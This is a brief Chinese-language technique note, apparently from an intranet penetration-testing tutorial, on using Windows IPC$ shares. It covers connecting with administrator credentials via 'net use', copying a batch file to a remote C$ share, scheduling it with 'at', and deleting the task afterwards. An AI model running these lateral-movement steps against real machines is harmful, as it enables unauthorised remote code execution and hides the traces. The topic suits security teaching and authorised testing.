- 常用windows远程连接和相关命令
- IPC
IPC连接使用方法:
net use \\192.168.xxx.xxx\ipc$ "Aa123456@" /user:administrator
net use '''查看当前连接''' ipc$利用条件:
- 开启139、445端口
- 管理员开启了默认共享
2.获取远程主机信息
1 dir #列出文件
2 tasklist /S /U /P #列出进程
3 #@命令创建定时任务
4
5 net time \\192.168.XXX.XXX
6 copy calc.bat \\192.168.XXX.XXX\C$
7 at \\192.168.XXX.XXX 4:11PM C:\calc.bat
8 #清除记录(数字为进程号)
9 at \\192.168.XXX.XXX 7 /delete windows vista 和Server2008之后废除@命令,采用schtasks
![内网安全之:Metasploit 中的端口转发与端口映射[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)